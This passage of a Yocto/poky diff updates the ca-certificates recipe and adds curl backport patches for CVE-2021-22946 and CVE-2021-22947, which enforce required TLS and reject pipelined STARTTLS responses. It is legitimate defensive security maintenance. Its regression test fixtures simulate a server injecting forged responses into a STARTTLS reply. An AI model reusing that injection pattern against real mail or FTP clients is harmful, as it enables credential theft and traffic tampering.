Vcs-Git: https://salsa.debian.org/debian/ca-certificates.git + Vcs-Browser: https://salsa.debian.org/debian/ca-certificates +diff --git a/mozilla/certdata2pem.py b/mozilla/certdata2pem.py +index ede23d4..7d796f1 100644 +--- a/mozilla/certdata2pem.py ++++ b/mozilla/certdata2pem.py +@@ -21,16 +21,12 @@ + # USA. + + import base64 +-import datetime + import os.path + import re + import sys + import textwrap + import io + +-from cryptography import x509 +- +- + objects = [] + + # Dirty file parser. +@@ -121,13 +117,6 @@ for obj in objects: + if obj['CKA_CLASS'] == 'CKO_CERTIFICATE': + if not obj['CKA_LABEL'] in trust or not trust[obj['CKA_LABEL']]: + continue +- +- cert = x509.load_der_x509_certificate(obj['CKA_VALUE']) +- if cert.not_valid_after < datetime.datetime.now(): +- print('!'*74) +- print('Trusted but expired certificate found: %s' % obj['CKA_LABEL']) +- print('!'*74) +- + bname = obj['CKA_LABEL'][1:-1].replace('/', '_')\ + .replace(' ', '_')\ + .replace('(', '=')\ +-- +2.20.1 + diff --git a/poky/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch b/poky/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch deleted file mode 100644 index f343ebf16e..0000000000 --- a/poky/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch +++ /dev/null @@ -1,26 +0,0 @@ -sbin/Makefile: Allow the sbin path to be configurable - -Some project sharing ca-certificates from Debian allow configuration -of the installation location. Make the sbin location configurable. - -Also ensure the target directory exists - -Signed-off-by: Richard Purdie -Upstream-Status: Submitted [https://salsa.debian.org/debian/ca-certificates/-/merge_requests/5] - ---- ca-certificates-20130119.orig/sbin/Makefile -+++ ca-certificates-20130119/sbin/Makefile -@@ -3,9 +3,12 @@ - # - # - -+SBINDIR = /usr/sbin -+ - all: - - clean: - - install: -- install -m755 update-ca-certificates $(DESTDIR)/usr/sbin/ -+ install -d $(DESTDIR)$(SBINDIR) -+ install -m755 update-ca-certificates $(DESTDIR)$(SBINDIR)/ diff --git a/poky/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch b/poky/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch deleted file mode 100644 index f78790923c..0000000000 --- a/poky/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch +++ /dev/null @@ -1,33 +0,0 @@ -update-ca-certificates: Replace deprecated mktemp -t with mktemp --tmpdir - -According to coreutils docs, mktemp -t is deprecated, switch to the ---tmpdir option instead. - -Signed-off-by: Richard Purdie -Upstream-Status: Submitted [https://salsa.debian.org/debian/ca-certificates/-/merge_requests/5] - -[This was originally for compatibility with toybox but toybox now -supports -t] ---- - sbin/update-ca-certificates | 6 +++--- - 1 file changed, 3 insertions(+), 3 deletions(-) - -diff --git a/sbin/update-ca-certificates b/sbin/update-ca-certificates -index 79c41bb..ae9e3f1 100755 ---- a/sbin/update-ca-certificates -+++ b/sbin/update-ca-certificates -@@ -113,9 +113,9 @@ trap cleanup 0 - - # Helper files. (Some of them are not simple arrays because we spawn - # subshells later on.) --TEMPBUNDLE="$(mktemp -t "${CERTBUNDLE}.tmp.XXXXXX")" --ADDED="$(mktemp -t "ca-certificates.tmp.XXXXXX")" --REMOVED="$(mktemp -t "ca-certificates.tmp.XXXXXX")" -+TEMPBUNDLE="$(mktemp --tmpdir "${CERTBUNDLE}.tmp.XXXXXX")" -+ADDED="$(mktemp --tmpdir "ca-certificates.tmp.XXXXXX")" -+REMOVED="$(mktemp --tmpdir "ca-certificates.tmp.XXXXXX")" - - # Adds a certificate to the list of trusted ones. This includes a symlink - # in /etc/ssl/certs to the certificate file and its inclusion into the --- -2.1.4 diff --git a/poky/meta/recipes-support/ca-certificates/ca-certificates_20210119.bb b/poky/meta/recipes-support/ca-certificates/ca-certificates_20210119.bb deleted file mode 100644 index 7dcc86fdc1..0000000000 --- a/poky/meta/recipes-support/ca-certificates/ca-certificates_20210119.bb +++ /dev/null @@ -1,90 +0,0 @@ -SUMMARY = "Common CA certificates" -DESCRIPTION = "This package includes PEM files of CA certificates to allow \ -SSL-based applications to check for the authenticity of SSL connections. \ -This derived from Debian's CA Certificates." -HOMEPAGE = "http://packages.debian.org/sid/ca-certificates" -SECTION = "misc" -LICENSE = "GPL-2.0+ & MPL-2.0" -LIC_FILES_CHKSUM = "file://debian/copyright;md5=ae5b36b514e3f12ce1aa8e2ee67f3d7e" - -# This is needed to ensure we can run the postinst at image creation time -DEPENDS = "" -DEPENDS_class-native = "openssl-native" -DEPENDS_class-nativesdk = "openssl-native" -# Need rehash from openssl and run-parts from debianutils -PACKAGE_WRITE_DEPS += "openssl-native debianutils-native" - -SRCREV = "181be7ebd169b4a6fb5d90c3e6dc791e90534144" - -SRC_URI = "git://salsa.debian.org/debian/ca-certificates.git;protocol=https \ - file://0002-update-ca-certificates-use-SYSROOT.patch \ - file://0001-update-ca-certificates-don-t-use-Debianisms-in-run-p.patch \ - file://update-ca-certificates-support-Toybox.patch \ - file://default-sysroot.patch \ - file://sbindir.patch \ - file://0003-update-ca-certificates-use-relative-symlinks-from-ET.patch \ - " -UPSTREAM_CHECK_GITTAGREGEX = "(?P\d+)" - -S = "${WORKDIR}/git" - -inherit allarch - -EXTRA_OEMAKE = "\ - 'CERTSDIR=${datadir}/ca-certificates' \ - 'SBINDIR=${sbindir}' \ -" - -do_compile_prepend() { - oe_runmake clean -} - -do_install () { - install -d ${D}${datadir}/ca-certificates \ - ${D}${sysconfdir}/ssl/certs \ - ${D}${sysconfdir}/ca-certificates/update.d - oe_runmake 'DESTDIR=${D}' install - - install -d ${D}${mandir}/man8 - install -m 0644 sbin/update-ca-certificates.8 ${D}${mandir}/man8/ - - install -d ${D}${sysconfdir} - { - echo "# Lines starting with # will be ignored" - echo "# Lines starting with ! will remove certificate on next update" - echo "#" - find ${D}${datadir}/ca-certificates -type f -name '*.crt' | \ - sed 's,^${D}${datadir}/ca-certificates/,,' | sort - } >${D}${sysconfdir}/ca-certificates.conf -} - -do_install_append_class-target () { - sed -i -e 's,/etc/,${sysconfdir}/,' \ - -e 's,/usr/share/,${datadir}/,' \ - -e 's,/usr/local,${prefix}/local,' \ - ${D}${sbindir}/update-ca-certificates \ - ${D}${mandir}/man8/update-ca-certificates.8 -} - -pkg_postinst_${PN}_class-target () { - SYSROOT="$D" $D${sbindir}/update-ca-certificates -} - -CONFFILES_${PN} += "${sysconfdir}/ca-certificates.conf" - -# Rather than make a postinst script that works for both target and nativesdk, -# we just run update-ca-certificate from do_install() for nativesdk. -CONFFILES_${PN}_append_class-nativesdk = " ${sysconfdir}/ssl/certs/ca-certificates.crt" -do_install_append_class-nativesdk () { - SYSROOT="${D}${SDKPATHNATIVE}" ${D}${sbindir}/update-ca-certificates -} - -do_install_append_class-native () { - SYSROOT="${D}${base_prefix}" ${D}${sbindir}/update-ca-certificates -} - -RDEPENDS_${PN}_append_class-target = " openssl-bin openssl" -RDEPENDS_${PN}_append_class-native = " openssl-native" -RDEPENDS_${PN}_append_class-nativesdk = " nativesdk-openssl-bin nativesdk-openssl" - -BBCLASSEXTEND = "native nativesdk" diff --git a/poky/meta/recipes-support/ca-certificates/ca-certificates_20211016.bb b/poky/meta/recipes-support/ca-certificates/ca-certificates_20211016.bb new file mode 100644 index 0000000000..a54d6b458a --- /dev/null +++ b/poky/meta/recipes-support/ca-certificates/ca-certificates_20211016.bb @@ -0,0 +1,89 @@ +SUMMARY = "Common CA certificates" +DESCRIPTION = "This package includes PEM files of CA certificates to allow \ +SSL-based applications to check for the authenticity of SSL connections. \ +This derived from Debian's CA Certificates." +HOMEPAGE = "http://packages.debian.org/sid/ca-certificates" +SECTION = "misc" +LICENSE = "GPL-2.0+ & MPL-2.0" +LIC_FILES_CHKSUM = "file://debian/copyright;md5=ae5b36b514e3f12ce1aa8e2ee67f3d7e" + +# This is needed to ensure we can run the postinst at image creation time +DEPENDS = "" +DEPENDS_class-native = "openssl-native" +DEPENDS_class-nativesdk = "openssl-native" +# Need rehash from openssl and run-parts from debianutils +PACKAGE_WRITE_DEPS += "openssl-native debianutils-native" + +SRCREV = "07de54fdcc5806bde549e1edf60738c6bccf50e8" + +SRC_URI = "git://salsa.debian.org/debian/ca-certificates.git;protocol=https;branch=master \ + file://0002-update-ca-certificates-use-SYSROOT.patch \ + file://0001-update-ca-certificates-don-t-use-Debianisms-in-run-p.patch \ + file://default-sysroot.patch \ + file://0003-update-ca-certificates-use-relative-symlinks-from-ET.patch \ + file://0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch \ + " +UPSTREAM_CHECK_GITTAGREGEX = "(?P\d+)" + +S = "${WORKDIR}/git" + +inherit allarch + +EXTRA_OEMAKE = "\ + 'CERTSDIR=${datadir}/ca-certificates' \ + 'SBINDIR=${sbindir}' \ +" + +do_compile_prepend() { + oe_runmake clean +} + +do_install () { + install -d ${D}${datadir}/ca-certificates \ + ${D}${sysconfdir}/ssl/certs \ + ${D}${sysconfdir}/ca-certificates/update.d + oe_runmake 'DESTDIR=${D}' install + + install -d ${D}${mandir}/man8 + install -m 0644 sbin/update-ca-certificates.8 ${D}${mandir}/man8/ + + install -d ${D}${sysconfdir} + { + echo "# Lines starting with # will be ignored" + echo "# Lines starting with ! will remove certificate on next update" + echo "#" + find ${D}${datadir}/ca-certificates -type f -name '*.crt' | \ + sed 's,^${D}${datadir}/ca-certificates/,,' | sort + } >${D}${sysconfdir}/ca-certificates.conf +} + +do_install_append_class-target () { + sed -i -e 's,/etc/,${sysconfdir}/,' \ + -e 's,/usr/share/,${datadir}/,' \ + -e 's,/usr/local,${prefix}/local,' \ + ${D}${sbindir}/update-ca-certificates \ + ${D}${mandir}/man8/update-ca-certificates.8 +} + +pkg_postinst_${PN}_class-target () { + SYSROOT="$D" $D${sbindir}/update-ca-certificates +} + +CONFFILES_${PN} += "${sysconfdir}/ca-certificates.conf" + +# Rather than make a postinst script that works for both target and nativesdk, +# we just run update-ca-certificate from do_install() for nativesdk. +CONFFILES_${PN}_append_class-nativesdk = " ${sysconfdir}/ssl/certs/ca-certificates.crt" +do_install_append_class-nativesdk () { + SYSROOT="${D}${SDKPATHNATIVE}" ${D}${sbindir}/update-ca-certificates +} + +do_install_append_class-native () { + SYSROOT="${D}${base_prefix}" ${D}${sbindir}/update-ca-certificates +} + +RDEPENDS_${PN}_append_class-target = " openssl-bin openssl" +RDEPENDS_${PN}_append_class-native = " openssl-native" +RDEPENDS_${PN}_append_class-nativesdk = " nativesdk-openssl-bin nativesdk-openssl" + +BBCLASSEXTEND = "native nativesdk" diff --git a/poky/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch b/poky/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch new file mode 100644 index 0000000000..4afd755149 --- /dev/null +++ b/poky/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch @@ -0,0 +1,86 @@ +Backport of: + +From 1397a7de6e312e019a3b339f855ba0a5cafa9127 Mon Sep 17 00:00:00 2001 +From: Daniel Stenberg +Date: Mon, 21 Sep 2020 09:15:51 +0200 +Subject: [PATCH] ftp: separate FTPS from FTP over "HTTPS proxy" + +When using HTTPS proxy, SSL is used but not in the view of the FTP +protocol handler itself so separate the connection's use of SSL from the +FTP control connection's sue. + +Reported-by: Mingtao Yang +Fixes #5523 +Closes #6006 + +Upstream-Status: backport from 7.68.0-1ubuntu2.7 +Signed-off-by: Mike Crowe +--- + lib/ftp.c | 13 ++++++------- + lib/urldata.h | 1 + + 2 files changed, 7 insertions(+), 7 deletions(-) + +diff --git a/lib/ftp.c b/lib/ftp.c +index 3382772..677527f 100644 +--- a/lib/ftp.c ++++ b/lib/ftp.c +@@ -2488,7 +2488,7 @@ static CURLcode ftp_state_loggedin(struct connectdata *conn) + { + CURLcode result = CURLE_OK; + +- if(conn->ssl[FIRSTSOCKET].use) { ++ if(conn->bits.ftp_use_control_ssl) { + /* PBSZ = PROTECTION BUFFER SIZE. + + The 'draft-murray-auth-ftp-ssl' (draft 12, page 7) says: +@@ -2633,11 +2633,8 @@ static CURLcode ftp_statemach_act(struct connectdata *conn) + } + #endif + +- if(data->set.use_ssl && +- (!conn->ssl[FIRSTSOCKET].use || +- (conn->bits.proxy_ssl_connected[FIRSTSOCKET] && +- !conn->proxy_ssl[FIRSTSOCKET].use))) { +- /* We don't have a SSL/TLS connection yet, but FTPS is ++ if(data->set.use_ssl && !conn->bits.ftp_use_control_ssl) { ++ /* We don't have a SSL/TLS control connection yet, but FTPS is + requested. Try a FTPS connection now */ + + ftpc->count3 = 0; +@@ -2682,6 +2679,7 @@ static CURLcode ftp_statemach_act(struct connectdata *conn) + result = Curl_ssl_connect(conn, FIRSTSOCKET); + if(!result) { + conn->bits.ftp_use_data_ssl = FALSE; /* clear-text data */ ++ conn->bits.ftp_use_control_ssl = TRUE; /* SSL on control */ + result = ftp_state_user(conn); + } + } +@@ -3072,7 +3070,7 @@ static CURLcode ftp_block_statemach(struct connectdata *conn) + * + */ + static CURLcode ftp_connect(struct connectdata *conn, +- bool *done) /* see description above */ ++ bool *done) /* see description above */ + { + CURLcode result; + struct ftp_conn *ftpc = &conn->proto.ftpc; +@@ -3093,6 +3091,7 @@ static CURLcode ftp_connect(struct connectdata *conn, + result = Curl_ssl_connect(conn, FIRSTSOCKET); + if(result) + return result; ++ conn->bits.ftp_use_control_ssl = TRUE; + } + + Curl_pp_init(pp); /* init the generic pingpong data */ +diff --git a/lib/urldata.h b/lib/urldata.h +index ff2d686..d1fb4a9 100644 +--- a/lib/urldata.h ++++ b/lib/urldata.h +@@ -461,6 +461,7 @@ struct ConnectBits { + EPRT doesn't work we disable it for the forthcoming + requests */ + BIT(ftp_use_data_ssl); /* Enabled SSL for the data connection */ ++ BIT(ftp_use_control_ssl); /* Enabled SSL for the control connection */ + #endif + BIT(netrc); /* name+password provided by netrc */ + BIT(userpwd_in_url); /* name+password found in url */ diff --git a/poky/meta/recipes-support/curl/curl/CVE-2021-22946.patch b/poky/meta/recipes-support/curl/curl/CVE-2021-22946.patch new file mode 100644 index 0000000000..98032d8b78 --- /dev/null +++ b/poky/meta/recipes-support/curl/curl/CVE-2021-22946.patch @@ -0,0 +1,328 @@ +Backport of: + +From 96d71feb27e533a8b337512841a537952916262c Mon Sep 17 00:00:00 2001 +From: Patrick Monnerat +Date: Wed, 8 Sep 2021 11:56:22 +0200 +Subject: [PATCH] ftp,imap,pop3: do not ignore --ssl-reqd + +In imap and pop3, check if TLS is required even when capabilities +request has failed. + +In ftp, ignore preauthentication (230 status of server greeting) if TLS +is required. + +Bug: https://curl.se/docs/CVE-2021-22946.html +Upstream-Status: backport from 7.68.0-1ubuntu2.7 +Signed-off-by: Mike Crowe +CVE: CVE-2021-22946 +--- + lib/ftp.c | 9 ++++--- + lib/imap.c | 24 ++++++++---------- + lib/pop3.c | 33 +++++++++++------------- + tests/data/Makefile.inc | 2 ++ + tests/data/test984 | 56 +++++++++++++++++++++++++++++++++++++++++ + tests/data/test985 | 54 +++++++++++++++++++++++++++++++++++++++ + tests/data/test986 | 53 ++++++++++++++++++++++++++++++++++++++ + 7 files changed, 195 insertions(+), 36 deletions(-) + create mode 100644 tests/data/test984 + create mode 100644 tests/data/test985 + create mode 100644 tests/data/test986 + +diff --git a/lib/ftp.c b/lib/ftp.c +index 677527f..91b43d8 100644 +--- a/lib/ftp.c ++++ b/lib/ftp.c +@@ -2606,9 +2606,12 @@ static CURLcode ftp_statemach_act(struct connectdata *conn) + /* we have now received a full FTP server response */ + switch(ftpc->state) { + case FTP_WAIT220: +- if(ftpcode == 230) +- /* 230 User logged in - already! */ +- return ftp_state_user_resp(conn, ftpcode, ftpc->state); ++ if(ftpcode == 230) { ++ /* 230 User logged in - already! Take as 220 if TLS required. */ ++ if(data->set.use_ssl <= CURLUSESSL_TRY || ++ conn->bits.ftp_use_control_ssl) ++ return ftp_state_user_resp(conn, ftpcode, ftpc->state); ++ } + else if(ftpcode != 220) { + failf(data, "Got a %03d ftp-server response when 220 was expected", + ftpcode); +diff --git a/lib/imap.c b/lib/imap.c +index 66172bd..9880ce1 100644 +--- a/lib/imap.c ++++ b/lib/imap.c +@@ -917,22 +917,18 @@ static CURLcode imap_state_capability_resp(struct connectdata *conn, + line += wordlen; + } + } +- else if(imapcode == IMAP_RESP_OK) { +- if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) { +- /* We don't have a SSL/TLS connection yet, but SSL is requested */ +- if(imapc->tls_supported) +- /* Switch to TLS connection now */ +- result = imap_perform_starttls(conn); +- else if(data->set.use_ssl == CURLUSESSL_TRY) +- /* Fallback and carry on with authentication */ +- result = imap_perform_authentication(conn); +- else { +- failf(data, "STARTTLS not supported."); +- result = CURLE_USE_SSL_FAILED; +- } ++ else if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) { ++ /* PREAUTH is not compatible with STARTTLS. */ ++ if(imapcode == IMAP_RESP_OK && imapc->tls_supported && !imapc->preauth) { ++ /* Switch to TLS connection now */ ++ result = imap_perform_starttls(conn); + } +- else ++ else if(data->set.use_ssl <= CURLUSESSL_TRY) + result = imap_perform_authentication(conn); ++ else { ++ failf(data, "STARTTLS not available."); ++ result = CURLE_USE_SSL_FAILED; ++ } + } + else + result = imap_perform_authentication(conn); +diff --git a/lib/pop3.c b/lib/pop3.c +index 57c1373..145b2b4 100644 +--- a/lib/pop3.c ++++ b/lib/pop3.c +@@ -721,28 +721,23 @@ static CURLcode pop3_state_capa_resp(struct connectdata *conn, int pop3code, + } + } + } +- else if(pop3code == '+') { +- if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) { +- /* We don't have a SSL/TLS connection yet, but SSL is requested */ +- if(pop3c->tls_supported) +- /* Switch to TLS connection now */ +- result = pop3_perform_starttls(conn); +- else if(data->set.use_ssl == CURLUSESSL_TRY) +- /* Fallback and carry on with authentication */ +- result = pop3_perform_authentication(conn); +- else { +- failf(data, "STLS not supported."); +- result = CURLE_USE_SSL_FAILED; +- } +- } +- else +- result = pop3_perform_authentication(conn); +- } + else { + /* Clear text is supported when CAPA isn't recognised */ +- pop3c->authtypes |= POP3_TYPE_CLEARTEXT; ++ if(pop3code != '+') ++ pop3c->authtypes |= POP3_TYPE_CLEARTEXT; + +- result = pop3_perform_authentication(conn); ++ if(!data->set.use_ssl || conn->ssl[FIRSTSOCKET].use) ++ result = pop3_perform_authentication(conn); ++ else if(pop3code == '+' && pop3c->tls_supported) ++ /* Switch to TLS connection now */ ++ result = pop3_perform_starttls(conn); ++ else if(data->set.use_ssl <= CURLUSESSL_TRY) ++ /* Fallback and carry on with authentication */ ++ result = pop3_perform_authentication(conn); ++ else { ++ failf(data, "STLS not supported."); ++ result = CURLE_USE_SSL_FAILED; ++ } + } + + return result; +diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc +index f9535a6..0fa6799 100644 +--- a/tests/data/Makefile.inc ++++ b/tests/data/Makefile.inc +@@ -112,6 +112,8 @@ test945 test946 test947 test948 test949 test950 test951 test952 test953 \ + test954 test955 test956 test957 test958 test959 test960 test961 test962 \ + test963 test964 test965 test966 test967 test968 test969 \ + \ ++test984 test985 test986 \ ++\ + test1000 test1001 test1002 test1003 test1004 test1005 test1006 test1007 \ + test1008 test1009 test1010 test1011 test1012 test1013 test1014 test1015 \ + test1016 test1017 test1018 test1019 test1020 test1021 test1022 test1023 \ +diff --git a/tests/data/test984 b/tests/data/test984 +new file mode 100644 +index 0000000..e573f23 +--- /dev/null ++++ b/tests/data/test984 +@@ -0,0 +1,56 @@ ++ ++ ++ ++IMAP ++STARTTLS ++ ++ ++ ++# ++# Server-side ++ ++ ++REPLY CAPABILITY A001 BAD Not implemented ++ ++ ++ ++# ++# Client-side ++ ++ ++SSL ++ ++ ++imap ++ ++ ++IMAP require STARTTLS with failing capabilities ++ ++ ++imap://%HOSTIP:%IMAPPORT/%TESTNUMBER -T log/upload%TESTNUMBER -u user:secret --ssl-reqd ++ ++ ++Date: Mon, 7 Feb 1994 21:52:25 -0800 (PST) ++From: Fred Foobar ++Subject: afternoon meeting ++To: joe@example.com ++Message-Id: ++MIME-Version: 1.0 ++Content-Type: TEXT/PLAIN; CHARSET=US-ASCII ++ ++Hello Joe, do you think we can meet at 3:30 tomorrow? ++ ++ ++ ++# ++# Verify data after the test has been "shot" ++ ++# 64 is CURLE_USE_SSL_FAILED ++ ++64 ++ ++ ++A001 CAPABILITY ++ ++ ++ +diff --git a/tests/data/test985 b/tests/data/test985 +new file mode 100644 +index 0000000..d0db4aa +--- /dev/null ++++ b/tests/data/test985 +@@ -0,0 +1,54 @@ ++ ++ ++ ++POP3 ++STARTTLS ++ ++ ++ ++# ++# Server-side ++ ++ ++REPLY CAPA -ERR Not implemented ++ ++ ++From: me@somewhere ++To: fake@nowhere ++ ++body ++ ++-- ++ yours sincerely ++ ++ ++ ++# ++# Client-side ++ ++ ++SSL ++ ++ ++pop3 ++ ++ ++POP3 require STARTTLS with failing capabilities ++ ++ ++pop3://%HOSTIP:%POP3PORT/%TESTNUMBER -u user:secret --ssl-reqd ++ ++ ++ ++# ++# Verify data after the test has been "shot" ++ ++# 64 is CURLE_USE_SSL_FAILED ++ ++64 ++ ++ ++CAPA ++ ++ ++ +diff --git a/tests/data/test986 b/tests/data/test986 +new file mode 100644 +index 0000000..a709437 +--- /dev/null ++++ b/tests/data/test986 +@@ -0,0 +1,53 @@ ++ ++ ++ ++FTP ++STARTTLS ++ ++ ++ ++# ++# Server-side ++ ++ ++REPLY welcome 230 Welcome ++REPLY AUTH 500 unknown command ++ ++ ++ ++# Client-side ++ ++ ++SSL ++ ++ ++ftp ++ ++ ++FTP require STARTTLS while preauthenticated ++ ++ ++data ++ to ++ see ++that FTPS ++works ++ so does it? ++ ++ ++--ssl-reqd --ftp-ssl-control ftp://%HOSTIP:%FTPPORT/%TESTNUMBER -T log/test%TESTNUMBER.txt -u user:secret ++ ++ ++ ++# Verify data after the test has been "shot" ++ ++# 64 is CURLE_USE_SSL_FAILED ++ ++64 ++ ++ ++AUTH SSL ++AUTH TLS ++ ++ ++ diff --git a/poky/meta/recipes-support/curl/curl/CVE-2021-22947.patch b/poky/meta/recipes-support/curl/curl/CVE-2021-22947.patch new file mode 100644 index 0000000000..070a328e27 --- /dev/null +++ b/poky/meta/recipes-support/curl/curl/CVE-2021-22947.patch @@ -0,0 +1,352 @@ +Backport of: + +From 259b4f2e1fd01fbc55e569ee0a507afeae34f77c Mon Sep 17 00:00:00 2001 +From: Patrick Monnerat +Date: Tue, 7 Sep 2021 13:26:42 +0200 +Subject: [PATCH] ftp,imap,pop3,smtp: reject STARTTLS server response + pipelining + +If a server pipelines future responses within the STARTTLS response, the +former are preserved in the pingpong cache across TLS negotiation and +used as responses to the encrypted commands. + +This fix detects pipelined STARTTLS responses and rejects them with an +error. + +Bug: https://curl.se/docs/CVE-2021-22947.html +Upstream-Status: backport from 7.68.0-1ubuntu2.7 +Signed-off-by: Mike Crowe +CVE: CVE-2021-22947 + +--- + lib/ftp.c | 3 +++ + lib/imap.c | 4 +++ + lib/pop3.c | 4 +++ + lib/smtp.c | 4 +++ + tests/data/Makefile.inc | 2 ++ + tests/data/test980 | 52 ++++++++++++++++++++++++++++++++++++ + tests/data/test981 | 59 +++++++++++++++++++++++++++++++++++++++++ + tests/data/test982 | 57 +++++++++++++++++++++++++++++++++++++++ + tests/data/test983 | 52 ++++++++++++++++++++++++++++++++++++ + 9 files changed, 237 insertions(+) + create mode 100644 tests/data/test980 + create mode 100644 tests/data/test981 + create mode 100644 tests/data/test982 + create mode 100644 tests/data/test983 + +diff --git a/lib/ftp.c b/lib/ftp.c +index 91b43d8..31a34e8 100644 +--- a/lib/ftp.c ++++ b/lib/ftp.c +@@ -2670,6 +2670,9 @@ static CURLcode ftp_statemach_act(struct connectdata *conn) + case FTP_AUTH: + /* we have gotten the response to a previous AUTH command */ + ++ if(pp->cache_size) ++ return CURLE_WEIRD_SERVER_REPLY; /* Forbid pipelining in response. */ ++ + /* RFC2228 (page 5) says: + * + * If the server is willing to accept the named security mechanism, +diff --git a/lib/imap.c b/lib/imap.c +index 9880ce1..0ca700f 100644 +--- a/lib/imap.c ++++ b/lib/imap.c +@@ -946,6 +946,10 @@ static CURLcode imap_state_starttls_resp(struct connectdata *conn, + + (void)instate; /* no use for this yet */ + ++ /* Pipelining in response is forbidden. */ ++ if(data->conn->proto.imapc.pp.cache_size) ++ return CURLE_WEIRD_SERVER_REPLY; ++ + if(imapcode != IMAP_RESP_OK) { + if(data->set.use_ssl != CURLUSESSL_TRY) { + failf(data, "STARTTLS denied"); +diff --git a/lib/pop3.c b/lib/pop3.c +index 145b2b4..8a2d52e 100644 +--- a/lib/pop3.c ++++ b/lib/pop3.c +@@ -753,6 +753,10 @@ static CURLcode pop3_state_starttls_resp(struct connectdata *conn, + + (void)instate; /* no use for this yet */ + ++ /* Pipelining in response is forbidden. */ ++ if(data->conn->proto.pop3c.pp.cache_size) ++ return CURLE_WEIRD_SERVER_REPLY; ++ + if(pop3code != '+') { + if(data->set.use_ssl != CURLUSESSL_TRY) { + failf(data, "STARTTLS denied"); +diff --git a/lib/smtp.c b/lib/smtp.c +index e187287..66183e2 100644 +--- a/lib/smtp.c ++++ b/lib/smtp.c +@@ -820,6 +820,10 @@ static CURLcode smtp_state_starttls_resp(struct connectdata *conn, + + (void)instate; /* no use for this yet */ + ++ /* Pipelining in response is forbidden. */ ++ if(data->conn->proto.smtpc.pp.cache_size) ++ return CURLE_WEIRD_SERVER_REPLY; ++ + if(smtpcode != 220) { + if(data->set.use_ssl != CURLUSESSL_TRY) { + failf(data, "STARTTLS denied, code %d", smtpcode); +diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc +index 0fa6799..60e8176 100644 +--- a/tests/data/Makefile.inc ++++ b/tests/data/Makefile.inc +@@ -112,6 +112,8 @@ test945 test946 test947 test948 test949 test950 test951 test952 test953 \ + test954 test955 test956 test957 test958 test959 test960 test961 test962 \ + test963 test964 test965 test966 test967 test968 test969 \ + \ ++test980 test981 test982 test983 \ ++\ + test984 test985 test986 \ + \ + test1000 test1001 test1002 test1003 test1004 test1005 test1006 test1007 \ +diff --git a/tests/data/test980 b/tests/data/test980 +new file mode 100644 +index 0000000..97567f8 +--- /dev/null ++++ b/tests/data/test980 +@@ -0,0 +1,52 @@ ++ ++ ++ ++SMTP ++STARTTLS ++ ++ ++ ++# ++# Server-side ++ ++ ++CAPA STARTTLS ++AUTH PLAIN ++REPLY STARTTLS 454 currently unavailable\r\n235 Authenticated\r\n250 2.1.0 Sender ok\r\n250 2.1.5 Recipient ok\r\n354 Enter mail\r\n250 2.0.0 Accepted ++REPLY AUTH 535 5.7.8 Authentication credentials invalid ++ ++ ++ ++# ++# Client-side ++ ++ ++SSL ++ ++ ++smtp ++ ++ ++SMTP STARTTLS pipelined server response ++ ++ ++mail body ++ ++ ++smtp://%HOSTIP:%SMTPPORT/%TESTNUMBER --mail-rcpt recipient@example.com --mail-from sender@example.com -u user:secret --ssl --sasl-ir -T - ++ ++ ++ ++# ++# Verify data after the test has been "shot" ++ ++# 8 is CURLE_WEIRD_SERVER_REPLY ++ ++8 ++ ++ ++EHLO %TESTNUMBER ++STARTTLS ++ ++ ++ +diff --git a/tests/data/test981 b/tests/data/test981 +new file mode 100644 +index 0000000..2b98ce4 +--- /dev/null ++++ b/tests/data/test981 +@@ -0,0 +1,59 @@ ++ ++ ++ ++IMAP ++STARTTLS ++ ++ ++ ++# ++# Server-side ++ ++ ++CAPA STARTTLS ++REPLY STARTTLS A002 BAD currently unavailable\r\nA003 OK Authenticated\r\nA004 OK Accepted ++REPLY LOGIN A003 BAD Authentication credentials invalid ++ ++ ++ ++# ++# Client-side ++ ++ ++SSL ++ ++ ++imap ++ ++ ++IMAP STARTTLS pipelined server response ++ ++ ++imap://%HOSTIP:%IMAPPORT/%TESTNUMBER -T log/upload%TESTNUMBER -u user:secret --ssl ++ ++ ++Date: Mon, 7 Feb 1994 21:52:25 -0800 (PST) ++From: Fred Foobar ++Subject: afternoon meeting ++To: joe@example.com ++Message-Id: ++MIME-Version: 1.0 ++Content-Type: TEXT/PLAIN; CHARSET=US-ASCII ++ ++Hello Joe, do you think we can meet at 3:30 tomorrow? ++ ++ ++ ++# ++# Verify data after the test has been "shot" ++ ++# 8 is CURLE_WEIRD_SERVER_REPLY ++ ++8 ++ ++ ++A001 CAPABILITY ++A002 STARTTLS ++ ++ ++ +diff --git a/tests/data/test982 b/tests/data/test982 +new file mode 100644 +index 0000000..9e07cc0 +--- /dev/null ++++ b/tests/data/test982 +@@ -0,0 +1,57 @@ ++ ++ ++ ++POP3 ++STARTTLS ++ ++ ++ ++# ++# Server-side ++ ++ ++CAPA STLS USER ++REPLY STLS -ERR currently unavailable\r\n+OK user accepted\r\n+OK authenticated ++REPLY PASS -ERR Authentication credentials invalid ++ ++ ++From: me@somewhere ++To: fake@nowhere ++ ++body ++ ++-- ++ yours sincerely ++ ++ ++ ++# ++# Client-side ++ ++ ++SSL ++ ++ ++pop3 ++ ++ ++POP3 STARTTLS pipelined server response ++ ++ ++pop3://%HOSTIP:%POP3PORT/%TESTNUMBER -u user:secret --ssl ++ ++ ++ ++# ++# Verify data after the test has been "shot" ++ ++# 8 is CURLE_WEIRD_SERVER_REPLY ++ ++8 ++ ++ ++CAPA ++STLS ++ ++ ++ +diff --git a/tests/data/test983 b/tests/data/test983 +new file mode 100644 +index 0000000..300ec45 +--- /dev/null ++++ b/tests/data/test983 +@@ -0,0 +1,52 @@ ++ ++ ++ ++FTP ++STARTTLS ++ ++ ++ ++# ++# Server-side ++ ++ ++REPLY AUTH 500 unknown command\r\n500 unknown 